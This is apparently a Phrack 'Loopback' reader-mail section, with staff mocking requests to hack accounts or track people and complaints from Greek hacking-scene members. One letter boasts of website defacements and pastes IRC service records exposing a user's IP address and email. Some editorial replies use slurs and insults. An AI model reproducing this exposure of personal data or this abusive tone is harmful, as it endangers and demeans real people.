role in getting the desired position, but despite the formality when
applying for a job essential requirement is a diploma! At the moment
receive a diploma is very expensive, takes time and power.

ORDER DIPLOMA RIGHT NOW AND RAISE THE PROFESSIONAL LEVEL, SKILLS AND
EXPERIENCE!

    [ Can we send our order in via PDF? You have to open it with
      Acroread 9.x though, since you're only worth an 0lday to us.
      Thank you for playing "rm me harder" w/ phrackstaff! ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x03 - Desperate house wifes  ]=-----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Luna Tix <lunatix@linuxmail.org>
Subject: A request regarding pdf files

   [ Our resident Adobe consultant is currently on holidays. We do have our
     .txt specialists however. ]

Hi,

I have downloaded some adobe 3d files from a website, and need them to be
converted into autodesk inventor ipt files.

    [ You've knocked on the right door. ]

Can you teach me how to do this? If yes, I can send you some of the files
for trial, if you are successful, I am willing to pay for it.

    [ Excellent! How much can you pay exactly? Our local liquor store no
      longer accepts PDF conversion techniques in exchange for beer. ]

All the best.

Luna

                                    ---

From: sabrina <sabrina*******@gmail.com>
Subject: don't know where to go


hi,
i'm in need of someone to help me in a cyber cat burglar kind of way.
i've tried all the legal ways... police, fbi, fed trade commission all too
busy with terrorist.

    [ Now that they've caught Osama, they should have some free time. Try
      to contact them again. ]

i can go to a detective then civil lawyer but that would take way too much
time and an exorbitant amount of money.

   [ Clearly, you've mistaken us for the cheap option. ]

i need someone to find information
on exactly where someone is located. i have email address, cell phone and
bank account numbers ...

    [ Do you have GPS coordinates? ]

I'm hoping to find or at least be led to someone who is very creative in
using their computer. my only goal is to locate this person, i'm not out to
steal or do any harm.

    [ I know some very creative people. They compose music on their
      computer! For realz! Would that help you? ]

if you think you can help me i'll give you my phone number,  i can then
better explain why this way for me would be the only way to go,  i lost 20
years of my life's hard work, i just want to locate this person.

    [ Wow, sorry for being so hard on you with the previous comments,
      Sabrina. It is obvious to us now that you are clearly retarded.
      Please leave a comment on the website with your phone number. We'll
      get back to you. ]

thank you
sabrina


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x04 - Cooperation  ]=---------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Monika ****** <monika.******@software.com.pl>
Subject: cooperation

Dear Sir or Madam

    [ It's professor actually. ]

My name is Monika *********. I represent Hakin 9'- IT Security magazine
(for more details, please see our website www.hakin9.org). I would be very
much interested in long term cooperation with your company.

    [ Our company? :D ]

We would co-promote our services and spread the information on IT Security
together.

    [ Well the problem is that we don't have that many services:
        - 7-bit cleaning of ASCII papers, we are considered the market
          leaders in this service
        - Spam hunting with advanced regexp (i.e. matching ANTISPAM in the
          subject)
        - Mail storage, no backups though :(
        - Technical review of papers when we understand them
      See? That's not too much :-/
      But thanks for the kind offer. PHRACK could totally use the promotion
      of such a well established magazine as h8king (or whatever). ]

I am really looking forward to hearing from you.

    [ Don't call us, we'll call you! ]

Best Regards,

Monika ********

Software Press


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x05 - Help is requested! (again) ]=-------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Kevin **** <********@att.net>
Subject: Help with Persistent BIOS Infection

Hope you can help. I have a small video business and from my son's school
flashdrive my network of computers are infected with Persistent BIOS
Infection. My hard drives have been rearranged with FAT segments and i
believe is running my XP/Win7 OS's as a virtual machine.

    [ Unfortunately Joanna is not part of the staff. But we have the
      feeling that your analysis of the situation could be improved :> ]

This has caused my rendering performance to be reduced by 50%. Also when i
make DVD's the infection is on the disc and from complaints it infected
other machines. My software is legit and i don't download anything.

    [ Of course. Who does anyway? Your son perhaps :> ]

I'm new (6yrs) to computers, i somewhat know what to do but not really.

    [ So you know but you don't know. That's good, have the half of you
      that knows guide the other half that doesn't. You can't go wrong. ]

I have killed my network and now keep all computers separate but know
somehow i will get the infection back.

    [ You killed the poor network? :-/ ]

Could someone make me a batch file or better yet a ISO to boot and fix my
Bios and memory so it has Persistent BIOS Infection that is null. Giving
back my rendering power. Making it so i can't get this infection again.

   [ Just a thought: maybe if you didn't run arbitrary batch files that
     "someone" sent you, you wouldn't have this problem in the first
     place. But most probably that's not it. It must be a 'Persistent BIOS
     Infection' problem. ]

Maybe send me a zip file to my email address. Pleezz
I would be more than happy to donate for the cause.

    [ And yet another person willing to give us money. We should really run
      a company :D ]

Thank You
Kevin ****
*******@att.net

                                    ---

From: shashank **** <**********@gmail.com>
Subject: hey

hey,
i was searching some hacking forums site, & found one of the "phrack
Magazine".

    [ Then you failed. It's not a forum kid :) ]

It was pretty interesting. Can you help me out on how to hack Steam
Account.

    [ Do you have a paypal account? ]

                                    ---

From: David ***** <dfg******@yahoo.com>
Subject: RootKit Iphone 4g

Hey i was recently on your website and well i was looking for something to
mess with my friends, see we're all in the same class and we all connect to
the same network/router thing, and you have to login to gain access to the
network, so i was wondering if there was a way to control my friends
computer with mine while we're hooked to the network.

    [ XD ]

DoFoG



[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x06 - About the scene philes ]=-----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Prashant KV <bug@null.co.in>
Subject: Thank You

    [ You're very welcome. ]

Hi,
I would like say thanks each and every individual in Phrack team for
publishing our article. This will go a long way in creating awareness about
null community.
Thanks all....

    [ And thank you for the scene phile. Always a pleasure to exchange with
      interesting/nice people. ]

                                    ---

From: Hackers News <thehackernews@gmail.com>
Subject: Article Editing

    [ HEY!!! You're the guy who tried to befriend us on linkedin!!! ]

Hello Sir,
We are admin of "*The Hacker News*" : *http://www.thehackernews.com/* . We
read an article on your Website :
http://www.phrack.org/issues.html?issue=67&id=16#article
I wanna ask you that on what basis you write about "*Indian Cyber Army :
http://www.cyberarmy.in/*" .

*   Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as
    fake ICA by the actual ICA group. One glance at the website content
    tells you that there is some truth to what the actual ICA(indishell)
    guys and other say and reminds you of the infamous plagiarism cases
    (Ah! Any Indian h4x0r's favourite topic when they feel like bitching
    about something :-P)*

*Whatever you write is not fair and I think it represents the mistake
done by you, that you write about a group without knowing about them,
Read This : *

*http://www.cyberarmy.in/p/about-us.html*

*and I think you should 1st know about it. Hope you will edit the
article.... as soon as possible.*

    [ You may or may not be right and clearly we don't have enough
      information to judge. For the sake of the truth and freedom of
      speech, we are posting your comment. ]

*Thanks,*

    [ No prob dude. ]

*Owner*

*The Hacker News...*

                                    ---

    [ The following is a mail that we received several times between the
      21st and the 22nd of June... As we said in the introduction, a few
      greek people were angry because of the scene phile. Because we're
      (not that much) bastards, we felt that these people deserved the
      right to be published as well. So here it is...

      Oh and they even pasted it in the comments! ]


From: xak xak0r <xak3ri@hotmail.com>
Subject: Greek Hacking Scene is alive!

From: Unkn0wn <unknown.ws1@gmail.com>
Subject: GHS - read this message

From: Spyros Kous <spirou1988@hotmail.com>
Subject: GHS for you.

From: nikos piperos <piperos_22@hotmail.com>
Subject: By <GHS>

From: ****** ******* <deathlyrhymer@hotmail.com>
Subject: greek.hacking.scene

    [ Sorry, due to ASCII constraints we had to censor the name of this
      guy :D ]

From: Stephen O'Neill <apple-whore@hotmail.com>
Subject: 0xghs

    [ You've got your hex wrong dude ]

From: Brian Higgins <bhiggins69@hotmail.com>
Subject: **************************

    [ Hey next time write the subject in english please :) ]

From: eibhlin mcnamara <mcnamara105@hotmail.com>
Subject: G*H*S - always here

    [ A sibling of Sean maybe? ]

From: nikpa pfcc <aeknik@hotmail.com>
Subject: Greek Hacking Scene - Read your errors

From: nikpa papaa <nikpa21@gmail.com>
Subject: Greek Hacking Scene - Read your errors

   [ Yeah, we ordered the lamb gyros with extra pita and tzatziki. None of
     you guys delivered. Worst Greek Hacking Scene evar! Would not order 
     from you again. ]

From: NIKO*** *ANTAZO*OY*** <aeknik@yahoo.gr>
Subject: Read this, about errors - GHS

    [ This one had his name only partially encrypted. ]

From: kondor fromGHS <kondorghs@gmail.com>
Subject: Greek Hacking Scene

    [ Hey Kevin Mitnick? :) ]

Nice to see Greek Hacking Scene on Phrack, but very sad to say that there
is no connection of all those with reality. This post represents something
that even doesn't exist except theory.

In the other hand, is not mentioned technological steps and targets that
Greek Hacking Scene archived, not in theory, but in actions.

However in the References i see nothing trust source, while you avoid posts
on newspapers, magazines and tv about Greek Hacking Scene.

Maybe Phrack can't handle the name of GHS and writing about fantasies.
Greek Hacking Scene is not a group, team or crew etc. but is ideology of
decades, is not about fame, but is about targets, technology and advance.
You must know that GHS does NOT follow things such "Hackers Manifesto" and
is well known that this person take back what he said about this manifesto
in shake to save him from things. He even does NOT defence his ideology,
how then we can accept such thing?! Basically we are what we create and we
gonna call hacking what we think hacking is, you can call us as you want,
but this can't change our actions, we not negotiate our ideology and we are
not followers of any paid, fantasy or theory ideologies. We rage against
machine, the system. Is good that Phrack exist cuz keep the magic to those
who want to be related with hacking. While you keep the feeling of magic to
your readers, we know that is all about coding, methodology and how far
each mind can think to do things.

For those who forgets, security is a part of hacking, security is not
hacking. Hacking is every electronic violation, violation doesn't mean that
is illegal always. As a term, hacking is every electronic violation.

About Greek Hacking Scene you forget to mention a lot of groups and people
(and is not about names) who they did things and they left lot of stuffs
behind. Those people and groups they never care about their nicknames or
the name of the group cuz is useless, can be any nickname or group name, at
the end what it left, is what had created. Who make it, it doesn't matter
really cuz those who make it as share they do it cuz they want.

If is to write about things that are not related with the true and reality,
better don't write about Greek Hacking Scene. You can write for posers and
others who they want fame, but not for GHS. You can write fantasy, stories,
anything you like, but as long as is not connected with reality and true,
then don't write about Greek Hacking Scene. Maybe you can write for any
other Greek Hacking Scene you want or you believe, but mention also that is
not connected all those stories with Greek Hacking Scene (GREEK SENTENCE).

    [ GREEK SENTENCE is something written in greek that we could not
      translate nor write in the phile because of the greek alphabet. ]

Cheers,


Your article forgets to write about DefCon meetings that take place in
Greece, and of course about the unique Codehack meetings that shows live
Hacking. Or even is not mentioned things such SpyAdmin and Firehole, or
what about Hash, Phrapes, Cdx, r00thell, hackgr and more?! What about the
references on magazines, newspapers and tv? What about the members of Greek
Hacking Scene that works on penetration testing companies or making atm
softwares and banking or those who works in known computers and servers
companies and they create technology?!

About the grhack (that nobody knows) is those guys from auth that got
hacked their servers and their pcs and tooked personal files of them?

Check this link:
http://zone-h.org/mirror/id/6638423

I read slasher?! This person who has the grhack site that you took as
reference?! With the name ********** **********?!

    [ Publishing an individual's real name is against our rules. You
      got away with it in the comment section once. ]

Oh come on, i have also beautiful pictures who they poser as engineers!
Oh now i got it! They write about their selfs! How smart... what a fame...
what a pose!

Before you write anything about Greek Hacking Scene take a look to the
targets. We have down anarchist such indymedia sites, and also nationalist
sites, as well he hacked into Goverment sites, political parties, national
services, and of course all the hacking-security related greek sites who
they offer only theory and lies that has no connection with reallity and
hacking.

And i guess so you promote the Anarchy?! So don't forget Phrack to mention
that everything you wrote is about Anarchy, not about hacking.

Greek Hacking Scene has members from all political sides and we have things
in common we work for.

This is grhack.net, this is the guy that send hopeless messages to google
blogspot to DOWN the info that SpyAdmin post, passwords, files, everything!


->> Slasher is nameless@155.207.206.86 (LoCo En El CoCo)
->> Slasher is on: #grhack #anarchy


--ChanServ-- Information for channel #grhack:
--ChanServ--         Founder: Slasher
--ChanServ--     Description: GR Hack - http://www.grhack.net
--ChanServ--      Registered: Aug 05 21:36:46 2010 EEST


--NickServ-- Information for nickname Slasher:
--NickServ--          Realname: LoCo En El CoCo
--NickServ--   Is online since: Dec 21 17:26:15 2010 EET
--NickServ--   Time registered: Oct 25 23:22:13 1999 EEST
--NickServ-- Last quit message: Ping timeout
--NickServ--    E-mail address: slasher@grhack.net
--NickServ--           Options: Kill protection, Security, Private
--NickServ-- *** End of Info ***


Maybe spyadmin is closed by google blogspot after the emails of grhack.net
Slasher cuz the stuff is related about him

but look the comments of this website and the date, to know the existance
of spyadmin

http://press-gr.blogspot.com/2007/09/blog-post_3165.html

(SOMETHING IN GREEK...)
    spyadmin.blogspot.com
    (SOMETHING IN GREEK AGAIN)
    (7 September 2007)

Now look also the date of the defacement in the zone-h digital archive:

http://zone-h.org/mirror/id/6638423

and look the date too,
# Mirror saved on: 2007-09-08 13:58:32
# * Notified by: GHS
(8 September 2007)

---

Greek Hacking Scene has no colour and does not support any political side.

Take example to indymedia athens, i will give you 2 links, in the first
they say that GHS is nationalist and hack their website, and in the other
link on the same website, they give congratulations in GHS cuz they did
actions and defacements according to left ideology.

In fact GHS has it's own ideology and act as GHS believe.

1 link:
http://athens.indymedia.org/front.php3?lang=el&article_id=706934

2 link:
http://athens.indymedia.org/front.php3?lang=el&article_id=620090

The comments are yours, let see the Freedom of Speech now, the TRUE the
REALITY, the FACTS!

Somes they didn't learn from their mistakes. GHS has no hate for anyone and
act not for revenge causes or anything else. According to all our actions,
we do warning and when we act we just put the informations as is, we don't
put sauses, you put sauses maybe.

The reason i wrote this is the true and reality.

Before some years there are many "hackers" in Greek chat rooms etc, they
speak about theory and when kids comming to learn, they laught only at them
and they make those kids to become like them, liers without education and
knowledge, kids that become like them, to know just some words, theory
without they know what for they speak about and to spend lost time chatting
and destroy other kids comming. Members of GHS hacked and take access in
most and almost all Greek websites, chat rooms, irc servers etc, that was
security-hacking related. We are always here, maybe not the same persons,
but members of GHS are change all the time and keep the safe ideology. In
the other hand, we let teenagers who are interested to hacking, we turn
them to coding, to let them think their future, education, freedom ideas
and to let them want to do things and create. Defacements and Hacking are
our fireworks to let them get the magic and on the way to show to them that
there are so many tools and things on net to hack a website and hack, but
if you want to go more further, you have to learn coding, to explore, to
let your mind free and think far away, for what can be happen and what not.
To go a step further with their minds, not by giving them stuff in the
plate, but let them do it and explore it by their selfs! I know keeps that
believe and do things, on the way they do things and go advance, those kids
are the next cycle of GHS who will pass the same ideas, believes and
technology to the next generations.

Greek Hacking Scene 2010.

    [ All we can say is 'What?' ]

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x07 - Interesting mails ]=----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: "L. *****" <l.*******@yahoo.com>
Subject: idea for next profile

my you should do a hacker profile on j3ster since he is one of the most
prominent hackers that I've heard about out there,

    [ Dunno the guy. We already chose one anyway. You may have heard of
      him. ]

or do one on that rat who turned in bradley manning

    [ The saying is not: Snitches get Prophiles. ]


                                    ---

From: infosec <infosec@cyberdo.net>
Subject: Release date?

Hi Guys,

Firstly, let me thank you for the on-going release of this great
e-zine.

   [ You're welcome. ]

Most of these e-zines surfaced and then disappears over the horizon yet
albeit the long term delays in-between releases :)you've kept this
going.
Thank you.

    [ ^_^ ]

I am very much interested in the up and coming release and would like
to know the date or drop us a note on the website.

    [ Done. ]

Also, I'd like to know how to join phrack team of staff.

    [ There is a GREAT mystery about how the phrack staff acquires
      members. Sorry dude, there is currently no open spot :) ]

Greetz,
infosec

                                    ---

From: Zagan Hacktop <zagan@live.co.uk>
Subject:

YO!
do you still have an IRC?

    [ We do. But it's a private one. We may open a public or half-public
      one someday... Don't hold your breath however. ]

                                    ---

From: daniel ***** <******@gmail.com>
Subject: new age LoD

hi am a head of a team that decided that LoD
is a legacy and can't just disappear... it must be reborn or the web will
lose a lot and with the way things are going today
the web really can't afford it or it will eventually die for the simple
user...

we are looking for the original LoD members (or at least any way to
communicate with them)
(especially for night lightning)

if this information can be passed to them it would be really nice.. all we
want is some advice (not technical) ...


my email is ******@gmail.com (nick: galeran).
if you can help please do
thanks

    [ Not sure about the true intentions but anyway this might help.]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x08 - Greek people are angry  ]=----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


    [ For clarification purposes, we received this mail after we released
      the index and before we released the philes. ]

                                    ---

From: Iordanis Patimenos <iopatmenos@yahoo.gr>
Subject: Phrack 67

    [ So what, another greek? At least this one is not complaining about
      the scene phile ;) ]

YEAR: 2010, OSs:64-bit, protection mechanisms: ASLR, DEP, NX, .... , Attack
 mechanisms: JAVA VM exploitation, Flash VM exploitation, ... the only
thing you had to do was to let the knowledge flow.

    [ The only thing? Such a nice little kid daydreaming :) ]

What to do the info in 'Scraps of notes on remote stack overflow
exploitation', 'Exploiting Memory Corruptions in Fortran Programs Under
Unix/VMS' (FORTRAN wtf),

    [ FORTRAN... indeed :') We'll do something about COBOL as well (it is
      'safe' so no memory corruptions, something else). We'll keep you
      posted. ]

'A Eulogy For Format Strings' if we cannot apply on current protection
mechanisms.

    [ Well that's the point. You can. Oh wait, you would have known if 
      you had kept your sorry mouth shut and actually read the papers 
      first :> ]

New edit or better you didn't publish this new fucking delayed, bad content
phrack p67, BIG FAIL, that's not the PHRACK we know. What a retarded
content you provided after all this waiting time!!! Not a chance to compare
to previous phrack issues. This issue is just a joke, nothing more, happy
1st APril assholes, you made PHRACK seems trash magazine.

    [ The cool thing with morons like you is that it would be pointless to
      explain things, which makes our job somewhat easier. Congratulations
      for your participation in p68, you've made it ;-) ]

-Fan of Phrack-

    [ Yes. It shows. ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON

    [ Another desperate housewife? The name is familiar...]

YOU ARE SO FUCKING FUNNY

    [ WE DO HOPE WE ARE ]

I'M SURE THE NEW ISSUE WILL BE SUCH A FAIL AS THE PREVIOUS ONE (THE ONE
THAT YOU TRIED TO ADVERTISE AS A BIG HIT)

    [ OHHHHH A BIG HIT REALLY? DAMMIT MY CAPSLOCK IS REALLY FUCKED. ]

JUNE 2011: PHRACK ISSUE #68 ... YES _SUCH_A_FAIL

    [ NOT IN JUNE, WE ARE *ALWAYS* LATE ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON

Group: The Phrack Staff

    [ Hum, it seems that you have fixed the capslock problem.
      You're elite. ]

Most *FAIL* group ever in phrack, you hurt the magazine go away.

    [ Hey now I remember you!!! :) It looks like you are obsessed with us.
      You must be our number one fan in greece. Even now that we have so
      many greek fans. ]

    >>>>>>>>>> From earlier >>>>>>>>>>
    From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
    Subject: Phrack issue 58

    How can i get the binary-encryption.tar.gz
    from the article Runtime binary encryption?
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

    [ So:
        1. Did you manage to download the file? :)))))
        2. *EPIC* *FAIL*?
    ]

                                    ---

From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
Subject: New phrack issue

    [ What? You again? ]

Marry Christamas :) and happy New York

    [ LOL. You're doing it wrong! ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x09 - PHRACK got spam'd? ]=---------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: ***** ******** <darkjoker93@gmail.com>
Subject: ANTISPAM

Hi guys :)
Here's an article I've just written, I know it's a bit late for the
submissions, but perhaps you may publish it in the next issue. Anyway, the
topic is how to bypass a captcha, and, in particular, how to bypass the one
on your site :). No offense, but it's really weak.

    [ None taken. We simply took the first captcha mechanism available on
      the web which was not going to get us owned. However we got spam,
      that's for sure, sorry about that fellow readers. ]

If you don't find it interesting please at least change your captcha
because I'm really sick (and I'm sure I'm not the only one) of reading
spam messages (I swear it was not me :).

    [ We'll do both so that you can get better :> ]

I'm italian, therefore my english is not very good,

    [ Nobody's perfect! ]

if the paper is so bad written it can't be even read, send it back to me,
I'll try to rewrite it in a better way.

Bye,
darkjoker

    [ And that's the story of how his contribution got published in
      Linenoise. Thx darkjoker. ]

                                    ---

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0A - The urge to get p68!!! ]=-----------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: Barak ***** <barak*****@gmail.com>
Subject: Question

    [ This one is not the current president of the US, we checked. ]

Hi,

I have been following the magazine for a while now and I have been waiting
for the new issue. Last I checked it was supposed to come out in June...
Can you let me know when I should expect the new issue?

    [ Are you reading this? Then issue #68 is out. You're welcome. ]

Barak

    [ That's the problem with every issue, you should NEVER trust us when
      we announce dates ;) ]

                                    ---

From: Rodri ***** <rodrigo******@hotmail.com>
Subject:

    [ Hey ANTISPAM is missing! ]

Hello,

For godsake we are already in June!

    [ Sorry about that bro :) ]

Now seriously and kindly is it coming out soon?

Best regards.
Roders.

                                    ---

From: LEGEND XEON <legend.xeon@gmail.com>
Subject: Phrack 68th Issue Release

Hello mate,
I am very interested in upcoming 68th issue of phrack.
The whole world is counting on you!!

    [ The whole world? Not even the whole scene mate ;) ]

I just want to know when will be the release and can you give me a glimpse
of contents inside it.
I will be eagerly waiting for your reply.

    [ Hehe, hope you didn't wait too much. ]

~Legend_Xeon

                                    ---

From: fernando ****** <core******@gmail.com>
Subject:

my life gets duller every day you don't release the new issue

    [ Let's hope this one didn't commit suicide before we released :| ]


[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0B - Students project? ]=----------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: "(s) Charmaine Anderson" <Charmaine.Anderson@students.newport.ac.uk>
Subject: Creating Middle-Ware for Distributed Cryptanalytic Applications

To whom it may concern,

I am contacting you to tell you about my final year project for my degree.
I would be very grateful if you were able to follow my progress and perhaps
also contribute any tips and ideas. I will also be writing an application
which, if successful, I will be posting online for download.

Using the RC5 block cipher and the competitions run by RSA Laboratories
(1997-2007) as benchmarks, experiments will be conducted using different
methods of distributed computing. The implications of the results will lead
to a better understanding of how cryptanalysis can be conducted through
areas such as grids and internet-based cloud computing or virtualisation.

The reason for this project is that distribution methods have been used for
many years in order to conduct cryptanalysis; however, I have noticed that
this has been for purposes such as testing the security of new ciphers and
creating a better understanding of how they work. But, to my knowledge,
there has been little-to-no research into the implications of real-world
attacks through distribution.

To summarise, I plan to test the limits of computational security in order
to expose the possibility of real-world cryptanalytic attacks using the
'unlimited' computing power that is slowly becoming available to the
public.

It is possible to follow the progress of this project through
http://www.distributedcryptanalysis.co.uk/. A number of blogs are also
being used in order to attract more interest, links to these will be posted
on the website very shortly.

Yours Sincerely,

Charmaine Anderson

BSc (Hons) Forensic Computing
University of Wales, Newport

    [ Well he seemed to be a good kid so we published his mail ;) ]

                                    ---

From: Johannes Mitterer <johannesmitterer@googlemail.com>
Subject: Hacker's Manifesto

Dear Phrack-Team,

currently I'm working on my bachelor's thesis part of which is an analysis
of The Mentor's Hacker's Manifesto. In this context, there's little
confusion about the question how the manifesto was first published. As I
understand it, the manifesto was first published ONLINE in phrack magazine,
whereas my professor stated that the first issues of phrack including Issue
#7 in which the manifesto was published were only available offline as a
printed version and later put on the internet. Perhaps You could help me
clearing up this confusion.

    [ Wasn't the early edition of phrack all scene .txt philes on BBSes?
    Like, #7 was pre internet for sure. I doubt that any of the editors
    back then would have bothered printing hardcopies, since it is
    extremely inefficient and expensive and the target audience is ppl w/
    computers. ]

Thanks in advance!

Yours,
Johannes Mitterer

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0C - Phrack & the chicks ]=--------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: kimberly - <*******@hotmail.com>
Subject: Graduate essay

Hello Staff,
We are senior high school students from 'Stella Maris College' in the
Netherlands and we are writing an essay about the reputation of hacking. If
it is okay with you, we would like to ask a few questions:
- How could you start the site, because hacking is illegal and it might
  endanger your users who discuss hacking?

    [ Wait it's illegal? We're shutting down the site immediately :| ]

- Have you ever gotten negative/positive reactions to your site? And what
  were those reactions?

    [ Well everything is in this file :D ]

- Is there any information that is not known to people who are not hackers
  and that is not easy to find in books or the internet? If so, where could
  we find this information?

    [ IRCS? Nah it's just for the chitchat :) ]

- Is there anything in your opinion that is so important, that we can't
  possibly leave out? We would be very happy if you could answer these
  questions or forward this email to someone who might know more about
  this.

    [ I'm not too sure you guys will be able to graduate with that many
      questions so good luck :D ]

Thank you very much in advance!
- Dingding and Kimberly

                                    ---

From: Eva ******* <*****@gmail.com>
Subject: Article

Dear Phrack Staff,

I'm preparing an article concerning some hacks to Linden Lab's SecondLife
viewer and I would like to publish the results in your magazine. Could you
please, if possible, provide some details where and to whom I should send
it to and if there are any requirements I must fulfil.

Thank you,
Eva

    [ We published the paper in the linenoise.
      Thanks for the submission Eva! Nice pics btw ;> ]

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0D - ROFL ]=-----------------------------------------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: ***** ***** <****.*****.****@gmail.com>
Subject: script

Man, I was bored taking a break from working on a vpn project at a library
and decided to make a script in bash to download and decompress the phrack
mags. Its newb meat but I guess Im just going to send it in for you guys to
laugh at, rofl.

    [ ROFL indeed. ]

---
Jackie ***** ****** - *"Focus on Solutions not Problems"*

    [ But you create solutions for non existent problems :D ]

Email0: *****.*****.*****@gmail.com
Email1: skraps_rwt@yahoo.com

    [ We added the script below. If someone could help Nikol Eleutheriou to
      decrypt it so that she doesn't complain please... ]


                                    ---

From: Tom <thom128@gmail.com>
Subject: Phrack Rules The World!

Hi there,

I like hacking but I never done it.

    [ So how do you know that you like it? ]

Wrote a poem about it.

    [ Was it worth it? ]

I wanna work in IT as systems admin.

    [ Hem... ok? Why? :) ]

Please publish my poem in your magazine.

    [ Done! ]

Phrack Rules!

    [ Sure it does! ]

Heil from London, England.

Razor Tech Warrior

They told you that you were nothing
Just another name and number
They said you were dumb and dumber

But you stole
Their lives away
Network Nazi
Live to fight another day

    [ Network Nazi Live to fight another day <-- WTF ???? ]

Through the black
Of the nights metal sheets
In tower blocks and tenements
Cyber crime it breeds

The government will stomp you out
But burn their kernel
Lock it down
While others are still asleep.

    [ We are speechless. All we can say is: LOL. ]

                                    ---

From: Tom <thom***@gmail.com>
Subject: Some Photos From London

Hi there,

Just thought i would send u some pics of me and my family/friends. i love
the mag am a big fan...keep up the good work.

    [ And he really sent us pics. Your Grandma seems nice btw but you look
      like a virgin geek unfortunately :( ]

                                    ---

From: b-fox <*****@bol.com.br>
Subject: Hey... Mother fucker

    [ Hey. p0rn industry calls it MILF fucking ]

Wait my document... I'm gonna write I paper today about/regarding bomb
development and something abt legislation in general. Huge hug!

    [ Priceless. :') ]

[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|--=[ 0x0E - Shame Shame Shame.......shame on you ]=---------------------=|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]


From: varenya mehta <varenya2007@yahoo.co.in>
Subject: ANTISPAM

Run both ethernet and phone over existing Cat-5 cable

    [ Cool! New submission! \o/ ]

The new fad when building a house is to run Cat-5 cable to every wall jack.
These jacks can then be used for either ethernet or phone. When we got our
new house built, we chose to get four of these jacks, and we intended to
use them for phone service. Unfortunately, the wifi is a bit flaky in
places (even with two access points.) This got annoying up until the point
where three of the four wall jacks were being used for ethernet, leaving
just one for phone. This was a problem.

The solution is to run both ethernet and phone over the same existing cat-5
cable. Every wall jack becomes two jacks, one RJ-11 for phone and one RJ-45
for ethernet. This neat hack could save you a lot of money, as you only
have to buy new wall plates and jacks rather than wall plates, jacks, and
hundreds of feet of wire.

    [ Really cool hack. This one may fit in the linenoise :) ]

[...]

Also note that this procedure will not work with PoE (Power over Ethernet)
devices. Nothing bad will happen, it just won't transmit power. See step 13
for a possibly unsafe way to keep your PoE and add phone service. Also, it
will not work with gigabit ethernet-- gigabit ethernet uses all four pairs.
